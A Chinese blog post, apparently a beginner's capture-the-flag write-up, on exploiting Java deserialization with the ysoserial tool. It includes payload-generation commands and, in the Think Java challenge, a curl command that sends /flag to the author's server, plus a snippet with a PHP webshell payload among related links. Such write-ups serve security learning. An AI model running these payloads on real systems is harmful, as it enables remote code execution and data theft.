java反序列化漏洞在CTF中的利用

最新推荐文章于 2024-05-31 10:46:10 发布
最新推荐文章于 2024-05-31 10:46:10 发布
阅读量914 收藏 8
点赞数 22
文章标签: java 安全 笔记 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64893612/article/details/136378608
版权

前言

今天突然想起来对java反序列化漏洞的学习做一个记录,所以随便写一下,文章内容基础且结构无序,全是我个人的大白话,适合ctf初学者随便看看用来下饭。

简单介绍

序列化指的是将对象或数据结构转换为可存储或传输的格式的过程,实现的方法是writeObject();反序列化则反之,实现的方法是readObject(),可以简单地理解为将文件压缩和解压缩的过程。

与PHP中反序列互相触发魔法函数导致的漏洞成因不同,java反序列化漏洞的成因主要是由于java序列化和反序列化机制的设计特点所致,简单地讲,只要反序列化代码中含有危险的命令代码,且该代码的参数是可控的,那它就存在该漏洞。

漏洞原理在我今天这里不是重要的,我主要想记录的是该漏洞的利用方式。

通常在解题中如果你看到一段字符串以rO0AB开头,那它是java序列化后base64编码的数据;如果一段字符串以aced开头,那它是java序列化后十六进制的数据,碰到这两种情况都基本可以认定该题考点为java反序列化漏洞,如果有直接接受该字符串的输入点,就可以尝试用链子直接打。

链子

链子通常指的是cc链攻击(Command and Control),在反序列化过程中插入恶意代码来进行RCE,在成为大牛后可以自行编写链子,像我一样的初学者还是建议使用ysoserial工具来一步到位。

工具下载连接

由于要对序列化后的数据进行base64编码,建议将工具安装至linux系统

工具使用也很简单:

java -jar ysoserial-master.jar  CommonsCollections5 "whoami"|base64 -w0

其中CommonsCollections5为在ysoserial工具中选择的payload,使用不同组件的环境应有不同选择,实在不行就都试一遍!
在这里插入图片描述
如果一切正常,你的终端中应该会直接得到以ro0AB开头的一长串字符串,将其复制粘贴至漏洞点,然后拿下服务器吧!
在这里插入图片描述

[网鼎杯 2020 朱雀组]Think Java

题目地址

这道题目在来到java反序列化前还有sql注入获取用户名和账号的环节,由于不是本篇文章内容这里就直接给出:

username:admin
password:admin@Rrrr_ctf_asde

访问在线测试接口/swagger-ui.html可以看到三个对应不同功能的接口
在这里插入图片描述

在login中输入账号密码:
在这里插入图片描述

登录成功后返回信息,发现一串以ro0AB开头的字符串,可以判断出这是java序列化后base64编码的数据
在这里插入图片描述

将这串数据放入/current中提交:
在这里插入图片描述
发现回显出了admin的身份信息:
在这里插入图片描述

根据这些我们可以知道,该接口将数据反序列化了,那是否存在漏洞可以利用呢,接下来就可以使用ysoserial工具来尝试。

由于还不知道系统使用了哪些组件,即不知道应该选择哪工具中的一条payload,这里可以用bp的Java Deserialization Scanner插件去测试,如下图检测出了ROME,那就以此生成利用代码
在这里插入图片描述
由于该环境没有直接的回显点位,需要选择外带或者反弹shell的方式去获取到flag,我这里选择了外带的方式

java -jar ysoserial-master.jar ROME "curl ip -d @/flag"|base64 -w0

之后即可在服务器上看到带出来的信息
在这里插入图片描述

Atln1as
关注
  • 22
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
java序列漏洞挖掘
qq_45001989的博客
09-08 1108
java序列漏洞挖掘 1.漏洞触发场景 在java编写的web应用与web服务器间java通常会发送大量的序列对象例如以下场景:   1)HTTP请求的参数,cookies以及Parameters。   2)RMI协议,被广泛使用的RMI协议完全基于序列   4)JMX 同样用于处理序列对象   5)自定义协议 用来接收与发送原始的java对象 漏洞挖掘   (1)确定序列输入点     首先应找出readObject方法调用,在找到之后进行下一步的注入操作。一般可以通过以下方法进行查找:
Java序列漏洞利用工具.zip
04-10
java序列漏洞利用工具包含jboss|weblogic,网上其实有很多,但是用别人的工具收30分是不是有点不厚道,所以我用自己的分下载下来,然后以最低分贡献给大家,上次没有审核通过,希望这次可以
p85 CTF夺旗-JAVA考点编译&XXE&序列
weixin_43263566的博客
03-28 1538
p85 CTF夺旗-JAVA考点编译&XXE&序列
ctfshow的web入门->序列
2301_80481202的博客
03-23 1064
运行得到:O%3A10%3A%22ctfshowvip%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A7%3A%22877.php%22%3Bs%3A8%3A%22password%22%3Bs%3A25%3A%22%3C%3Fphp+%40eval%28%24_POST%5B1%5D%29%3B%3F%3E%22%3B%7D。file_get_contents('php://input')代码的这一句可以访问请求的原始数据流,可以获取到GET和POST的数据。
6-java安全——java序列漏洞利用
网络安全
07-01 3906
本篇将学习java序列漏洞原理,然后结合一个apache commons-collections组件序列漏洞来学习如何构造利用链。 我们知道序列操作主要是由ObjectOutputStream类的 writeObject()方法来完成,序列操作主要是由ObjectInputStream类的readObject()方法来完成。当可序列对象重写了readObject方法后,在序列时一般会调用序列对象的readObject方法。 在Student类重写ObjectInputSt
rmi 序列漏洞_序列漏洞整理
weixin_36123285的博客
12-23 365
群里总有人问序列漏洞是啥啊,学不明白啊,从来没听明白过, 面试有人问,闲聊也有人问;1个月前有人问,1个月后还有人在问今天就来整理一下个人对序列漏洞理解和这个洞涉及的一些知识点各种语言都有序列漏洞序列即将对象转为字节流,便于保存在文件,内存,数据库序列即将字节流转为对象也就是把数据转为一种可逆的数据结构,再把这种可逆的数据结构转回数据,这就是序列序列看到过一个通...
【心得】java序列漏洞利用启蒙个人笔记
uuzeray的博客
01-22 1299
不需要其他依赖,原生java库,支持序列后,触发一次dns请求HashMap存放键值对的集合为了验证键有没有重复,会对键 进行取哈希值操作hashCode 相同,就认为集合里面有这个键了,为了避免一个键对应多个值,所以会覆盖。
常见的Web漏洞——序列漏洞
热门推荐
江左盟的博客
06-07 1万+
序列简介 序列:把对象转换为字节序列的过程,即把对象转换为可以存储或传输的数据的过程。例如将内存的对象转换为二进制数据流或文件,在网络传输过程,可以是字节或是XML等格式。 序列:把字节序列恢复为对象的过程,即把可以存储或传输的数据转换为对象的过程。例如将二进制数据流或文件加载到内存还原为对象。 序列漏洞首次出现在2015。虽然漏洞较新,但利用十分热门。主要原因是对用户可控制的数据进行序列时,攻击者能够操纵序列的对象,从而将精心构造的恶意数据传递到应用程序代码
Java序列漏洞——jdbc序列漏洞利用
Thunderclap的博客
03-08 1009
如果攻击者能够控制JDBC连接设置项,那么就可以通过设置其指向恶意MySQL服务器进行ObjectInputStream.readObject()的序列攻击从而RCE。
Aapche Dubbo Java序列漏洞复现
Tauil的博客
07-29 520
将以下工具下载到攻击机ZooKeeper — 输入以下命令,下载完成后解压即可 ysoserial — 输入下面命令,如果该方式下载不成功直接浏览器访问网站下载 漏洞复现 准备攻击机,靶机安装有的靶机输入下列命令开启环境 攻击机终端输入 发现了2181端口是用于转发服务的,那么其作用可能是用于目标网页进行api服务转发,所以该端口可能包含了registry(远程注册表服务器,一般都是用ZooKeeper作为registry,我们可以尝试通过 zookeeper 进行连接进入先前下载的 zooke
JAVA序列漏洞简述
告白的博客
08-08 2267
0x00 漏洞原理 我们需要保存某一个对象的某一一个时间的状态信息,进行一些操作,比如利用序列将程序运行的对象状态以二进制形式储存在文件系统,然后可以在另外一个程序序列后的对象状态数据进行序列操作回复对象,可以有效的实现多平台之间的通信,对象持久储存。 0x01 漏洞描述必备*知识点* #序列序列 序列 (Serialization):将对象的状态信息转换为可以存储或传输的形式的过程。在序列期间,对象将其当前状态写入到临时或持久性存储区。 序列:从存储区读取该数据,并将
Java序列漏洞利用工具V1.7.jar
03-25
Java序列漏洞利用工具
Java序列漏洞检查工具V1.2_Weblogic XML序列漏洞检查工具CVE-2017-10271
11-11
Java序列漏洞检查工具V1.2_Weblogic XML序列漏洞检查工具CVE-2017-10271
Java序列漏洞介绍书籍
08-17
专业介绍Java序列漏洞知识,攻防技术
operator <=> (spaceship operator)
janeqi1987的专栏
05-28 1005
= 与!= 操作符为了检查是否相等,现在定义== 操作符就够了。当编译器找不到表达式的匹配声明a!=b 时,编译器会重写表达式并查找!(a==b)。若这不起作用,编译器也会尝试改变操作数的顺序,所以也会尝试!(b==a):a!=b,!(b==a)因此,对于TypeA 的a 和TypeB 的b,编译器将能够识别并编译a!= b若需要的话,可以这样做• 一个独立函数operator!• 一个独立函数operator==(TypeA, TypeB)
Java 异常处理try-catch块、finally子句以及自定义异常的使用
最新发布
Itmastergo的博客
05-31 800
异常是程序运行过程出现的非正常情况。Java 使用异常类(Exception 类及其子类)来表示这些异常情况。异常处理的核心思想是将正常的程序流程与异常处理流程分离开来,使代码更加清晰和可维护。Throwable 类:所有异常和错误的基类。Error 类:表示系统级的错误,程序通常无法处理,比如内存不足(OutOfMemoryError)。Exception 类:表示程序可以处理的异常情况。RuntimeException 类。
Java手动启动jar包
liangweihao的博客
05-29 294
【代码】Java手动启动jar包。
java调用cmd执行命令
weixin_45210565的博客
05-28 260
3、exec(String command, String[] envp) ,在调用外部程序之前设置系统环境变量,该变量仅供command入参使用,envp每个元素为一个系统环境变量,并且字符串格式为“环境变量名=环境变量值”。2、exec(String[] cmdArray) ,调用外部程序,入参cmdArray的元素将组合成为一条完整的外部可执行程序的启动路径或命令。1、exec(String command) ,调用外部程序,入参command为外部可执行程序的启动路径或命令。
Java序列漏洞一般利用思路
09-22
### 回答1: Java序列漏洞一般利用思路是利用Java序列机制,将恶意序列数据传递给目标系统,从而实现远程代码执行、拒绝服务等攻击。攻击者通常会构造恶意序列数据,使其在序列过程触发漏洞,从而执行恶意代码。为了防范此类攻击,可以采取一些措施,如限制序列对象的类型、使用安全的序列库等。 ### 回答2: Java序列漏洞利用思路主要包括以下几个步骤: 1. 找到目标:攻击者首先需要找到运行了可利用Java序列漏洞的目标程序。这可以通过分析目标程序的代码、网络流量或者漏洞公开报告等途径进行。 2. 构造恶意序列数据:攻击者需要构造恶意的序列数据,这些数据会被目标程序读取并解析。攻击者可以使用一些工具或者手动编写代码来生成恶意序列数据。 3. 选择合适的漏洞利用方式:根据目标程序的具体情况,攻击者可以选择合适的漏洞利用方式。常见的利用方式包括Java序列漏洞利用链,如利用未经过正确检验的序列的对象进行远程代码执行或者文件读写等操作。 4. 发送恶意序列数据:攻击者需要将构造好的恶意序列数据发送给目标程序。这可以通过网络连接、文件上传、内存注入等方式进行。 5. 触发序列:目标程序接收到攻击者发送的序列数据后,会进行相应的序列操作。在解析过程,如果存在漏洞,则恶意代码会被执行,导致安全问题。 6. 实现攻击目标:一旦恶意代码被执行,攻击者可以获得对目标程序的控制,从而进行进一步的攻击行为。这可能包括窃取敏感信息、执行任意代码、篡改数据等。 为了防范Java序列漏洞利用,开发者可以采取一些措施,如使用安全的序列序列库、校验序列输入、限制序列操作的范围和权限等。同时,及时更新和修补已知的漏洞也是非常重要的。 ### 回答3: Java序列漏洞利用思路如下: 在Java,对象的序列是将对象转换为字节流的过程,而序列则是将字节流还原为对象的过程。序列漏洞是指攻击者通过构造恶意的序列数据,再使用该数据进行序列操作,从而导致程序在序列的过程触发各种安全漏洞。 通常的利用思路如下: 1. 找到存在序列漏洞的目标:通过静态代码分析、动态分析或源码审计等手段,找到存在序列漏洞的应用程序。 2. 构造恶意的序列数据:攻击者通过修改或创建特定的序列数据,来生成恶意的序列数据。这些数据可能包含有害的代码或意外的操作。 3. 发送恶意数据进行序列:攻击者将构造好的恶意序列数据发送给目标应用程序,并通过触发序列操作,将恶意数据还原为对象。此时,存在漏洞的应用程序会执行恶意代码,并可能导致安全问题。 4. 利用漏洞进行攻击:一旦恶意代码被执行,攻击者可以在目标系统上执行各种恶意操作,如执行任意命令、远程代码执行、获取敏感信息等。 为了避免被序列漏洞攻击,需要对序列操作进行安全措施,比如使用白名单机制限制可序列的类、对序列方法进行签名等。同时,定期更新和修复Java环境,以及对目标应用程序进行安全测试和代码审计,也是减少序列漏洞风险的重要措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值